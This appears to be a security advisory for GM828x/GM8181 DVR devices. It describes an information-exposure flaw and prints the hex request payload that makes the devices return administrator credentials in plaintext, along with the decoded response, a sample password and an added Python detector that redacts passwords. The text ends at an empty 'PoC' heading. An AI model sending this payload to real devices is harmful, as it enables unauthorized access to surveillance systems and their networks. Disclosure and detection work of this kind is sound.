Summary

This report outlines a critical security vulnerability identified in Faraday Technology (Grain-Media) GM828x/GM8181 DVR devices. The vulnerability allows an unauthorized attacker to retrieve the device's login credentials by sending a specially crafted request to the device. It affects over 27,000 Internet-connected devices.


Affected Models

CWE

CWE-200 (Information Exposure)

Impact

An attacker leveraging this vulnerability can gain unauthorized access to the DVR system, potentially leading to unauthorized viewing or manipulation of video data, and possibly access to the connected network.

Vulnerability Details

An information exposure vulnerability exists in the GM828x/GM8181 DVR devices. An attacker can exploit it by sending a specially crafted request to the device. The device responds with an XML data structure that includes the administrative credentials in plaintext.

Request Payload:

5a5aaa55d3300000f00300000000000002000000010000000000000000000000

Response Payload:

5a5aaa55d3300000f003000001000000000000000000000000000000ff0000003c3f786d6c2076657273696f6e3d22312e3022203f3e0a3c4d6573736167652056657273696f6e3d2231223e0a202020203c4865616465723e0a20202020202020203c757365725f6366672063685f617574685f656e61626c653d2230223e0a2020202020202020202020203c61646d696e206e616d653d2241646d696e2220706173733d223430323233352220617574683d2231352220617574685f63685f6d61736b3d22363535333522202f3e0a2020202020202020202020203c7573657220757365725f636e743d223022202f3e0a20202020202020203c2f757365725f6366673e0a202020203c2f4865616465723e0a3c2f4d6573736167653e00

Decoded XML Response:

<?xml version="1.0" ?>
<Message Version="1">
    <Header>
        <user_cfg ch_auth_enable="0">
            <admin name="Admin" pass="402235" auth="15" auth_ch_mask="65535" />
            <user user_cnt="0" />
        </user_cfg>
    </Header>
</Message>

The response includes the administrator's username (Admin) and password (402235), exposing sensitive information.
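For detection, the response shape shown above can be recognised in captured traffic. The following is an added example, not part of the original advisory or the vendor's code: it checks a captured payload for the `5a5aaa55` prefix and an XML body carrying a `pass` attribute, and reports only the password length. The function name, the finding layout and the zero-filled header in the sample are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET

MAGIC = bytes.fromhex("5a5aaa55")  # leading bytes of both payloads in the advisory

# Constructed sample: the magic, zero-filled placeholder header bytes (not the
# device's real header), then the decoded XML from the advisory, NUL-terminated.
SAMPLE_XML = (
    '<?xml version="1.0" ?>\n<Message Version="1">\n    <Header>\n'
    '        <user_cfg ch_auth_enable="0">\n'
    '            <admin name="Admin" pass="402235" auth="15" auth_ch_mask="65535" />\n'
    '            <user user_cnt="0" />\n'
    '        </user_cfg>\n    </Header>\n</Message>'
)
SAMPLE = MAGIC + bytes(28) + SAMPLE_XML.encode() + b"\x00"


def find_credential_leak(payload: bytes):
    """Return a redacted finding if payload is a response exposing credentials, else None."""
    if not payload.startswith(MAGIC):
        return None
    start = payload.find(b"<?xml")  # locate the body; do not assume a header size
    if start < 0:
        return None  # binary frame without XML, e.g. a request
    body = payload[start:].split(b"\x00", 1)[0]
    if b"<!DOCTYPE" in body or b"<!ENTITY" in body:
        return None  # refuse DTDs so captured data cannot abuse entity expansion
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    accounts = [
        {"element": el.tag, "name": el.get("name", ""), "pass_len": len(el.get("pass"))}
        for el in root.iter()
        if "pass" in el.attrib
    ]
    if not accounts:
        return None
    # Report only the password length so the alert does not re-expose the secret.
    return {"xml_offset": start, "accounts": accounts}


if __name__ == "__main__":
    print(find_credential_leak(SAMPLE))
```

A non-`None` result for traffic leaving a DVR indicates that the device answered a credential request and its passwords should be treated as disclosed.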

PoC